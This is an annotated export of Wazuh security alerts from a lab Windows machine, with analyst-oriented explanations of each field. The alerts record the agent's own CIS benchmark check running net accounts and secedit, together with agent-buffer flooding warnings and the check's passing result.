ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:44.091 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be64-680a-320c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10704 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 26 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534575.2327789 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:46.4773051Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291351 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:44.314
ProcessGuid: {94294ddc-be64-680a-340c-000000000e00}
ProcessId: 14436
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be64-680a-320c-000000000e00}
ParentProcessId: 10704
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:44.314 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be64-680a-340c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14436 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be64-680a-320c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10704 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell process created an executable file in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92205 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534580.2332848 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:48.2996900Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291773 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:42:48.298
ProcessGuid: {94294ddc-be67-680a-3a0c-000000000e00}
ProcessId: 8604
Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_p4vcdh3q.d4n.ps1
CreationUtcTime: 2025-04-24 22:42:48.298
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:48.298 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be67-680a-3a0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8604 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_p4vcdh3q.d4n.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:42:48.298 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
C:\\Windows\\SysWOW64\\SecEdit.exe binary in a suspicious location launched by C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
🧠 What happened? C:\\Windows\\SysWOW64\\SecEdit.exe binary in a suspicious location launched by C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
🔍 Why it's important: Critical or commonly abused ATT&CK technique
rule.description: C:\\Windows\\SysWOW64\\SecEdit.exe binary in a suspicious location launched by C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92066 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534584.2335549 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:49.7011971Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 292055 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:49.694
ProcessGuid: {94294ddc-be69-680a-3c0c-000000000e00}
ProcessId: 6028
Image: C:\Windows\SysWOW64\SecEdit.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Windows Security Configuration Editor Command Tool
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: SeCEdit
CommandLine: "C:\WINDOWS\system32\SecEdit.exe" /export /cfg C:\WINDOWS\TEMP/secexport.cfg
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=FB968BA2416A930CD06AC599A61A50569AAA846CA15D0880A5DB80A81CF1500A
ParentProcessGuid: {94294ddc-be67-680a-3a0c-000000000e00}
ParentProcessId: 8604
ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \"LSAAnonymousNameLookup\").ToString().Split(\"=\")[1].Trim()"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:49.694 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be69-680a-3c0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6028 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\SecEdit.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows Security Configuration Editor Command Tool No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: SeCEdit No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\system32\\SecEdit.exe\" /export /cfg C:\\WINDOWS\\TEMP/secexport.cfg No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=FB968BA2416A930CD06AC599A61A50569AAA846CA15D0880A5DB80A81CF1500A No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be67-680a-3a0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8604 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: powershell \"$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \\\"LSAAnonymousNameLookup\\\").ToString().Split(\\\"=\\\")[1].Trim()\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Agent event queue is full. Events may be lost. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 203 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534599.2342118 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'full'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: full Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
rule.description: Agent event queue is flooded. Check the agent configuration. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 204 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534615.2342364 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'flooded'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: flooded Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
rule.description: Agent event queue is full. Events may be lost. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 203 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534619.2342637 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'full'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: full Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
rule.description: Agent event queue is flooded. Check the agent configuration. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 204 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534634.2342883 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'flooded'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: flooded Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from 'not applicable' to passed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from 'not applicable' to passed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from 'not applicable' to passed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19015 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['2.3.10.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534645.2343156 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26042 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines whether an anonymous user can request security identifier (SID) attributes for another user, or use a SID to obtain its corresponding user name. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If this policy setting is enabled, a user with local access could use the well-known Administrator's SID to learn the real name of the built-in Administrator account, even if it has been renamed. That person could then use the account name to initiate a password guessing attack. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\Security Options\Network access: Allow anonymous SID/Name translation Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 2.3.10.1 CIS benchmark control this single check implements – same value as rule.cis above.
data.sca.check.command: ['powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \\"LSAAnonymousNameLookup\\").ToString().Split(\\"=\\")[1].Trim()"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
